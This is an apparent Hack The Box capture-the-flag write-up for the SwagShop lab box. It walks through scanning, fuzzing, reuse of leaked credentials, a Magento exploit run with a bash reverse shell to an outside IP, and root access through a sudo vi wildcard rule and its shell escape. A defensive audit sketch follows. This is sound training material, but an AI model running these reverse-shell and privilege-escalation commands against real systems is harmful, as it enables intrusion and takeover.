HTB | SwagShop
This box is part of the Hack The Box Linux Privilege Escalation 101 track. Find the box here.
Skills Learned
Exploit modification
GTFOBins
NMAP
IP: 10.10.10.140
nmap -sT -p- --min-rate 10000 10.10.10.140

nmap -sC -sV -p 22,80 10.10.10.140

Port 80
Let's visit port 80

dirsearch -u http://swagshop.htb/ -e php,html -x 403,404

While looking at the directories, I found http://swagshop.htb/app/etc/local.xml,
which has root/admin credentials.

I was not able to find any login page, so I started fuzzing again.
dirsearch -u http://swagshop.htb/index.php/ -e php,html -x 403,404

Found /index.php/admin

Foothold/shell
Let's try to log in with the credentials we got earlier. They were not working; on Googling, I found this exploit.
In the script, change target to http://swagshop.htb/index.php
and run the script.

Let's try forme:forme
and we are in.

A simple Google search found me this.
In the script, change username, password and install_date, and run the script.

python 37811.py 'http://swagshop.htb/index.php/admin' "uname -a"

Now we can try for a reverse shell.
python 37811.py 'http://swagshop.htb/index.php/admin' "bash -c 'exec bash -i>& /dev/tcp/10.10.14.6/1234 0>&1'"

Found user.txt.

Priv Esc
sudo -l

We can use /usr/bin/vi /var/www/html/*
without a password.
sudo /usr/bin/vi /var/www/html/../../../root/root.txt
and we have root.txt.

Now let's try for a shell.
GTFOBins tells me how to get a shell.
sudo /usr/bin/vi /var/www/html/a
:set shell=/bin/sh
:shell
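Why the sudo rule above fails to confine vi, as an added audit sketch (not code from the original write-up). It flags sudo -l entries that pair a shell-capable program with wildcard arguments and checks whether an accepted path still resolves under the intended directory. The function names and the short program list are assumptions made for this example, and path resolution is lexical only (symlinks are not followed).

```python
import fnmatch
import posixpath

# Short illustrative list of programs that can start a shell from inside
# (an assumption for this example; GTFOBins keeps the full catalogue).
SHELL_ESCAPE = {"vi", "vim", "view", "less", "more", "man", "nano", "ed"}

def args_match(rule_args, typed_args):
    """sudoers matches command arguments as one string, and '*' there also
    matches '/'. fnmatchcase treats '*' the same way."""
    return fnmatch.fnmatchcase(typed_args, rule_args)

def audit_rule(rule):
    """Return findings for one command spec as printed by `sudo -l`."""
    command, _, args = rule.strip().partition(" ")
    findings = []
    if posixpath.basename(command) in SHELL_ESCAPE:
        findings.append("shell-escape: %s can start a shell as the target user" % command)
    if any(ch in args for ch in "*?["):
        findings.append("wildcard-args: '%s' does not confine the path" % args)
    return findings

def accepted_outside(base_dir, rule_args, typed_path):
    """True if the rule accepts typed_path but it resolves outside base_dir."""
    if not args_match(rule_args, typed_path):
        return False  # sudo would reject the command line
    resolved = posixpath.normpath(typed_path)
    return not (resolved == base_dir or resolved.startswith(base_dir + "/"))

# Constructed sample: the rule text as described in this write-up.
RULE = "/usr/bin/vi /var/www/html/*"

if __name__ == "__main__":
    for finding in audit_rule(RULE):
        print(finding)
    for path in ("/var/www/html/index.php",
                 "/var/www/html/../../../root/root.txt"):
        verdict = "ESCAPES" if accepted_outside("/var/www/html", "/var/www/html/*", path) else "inside"
        print(path, "->", verdict)
```

A rule that names exact files and uses sudoedit instead of a full editor produces neither finding.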
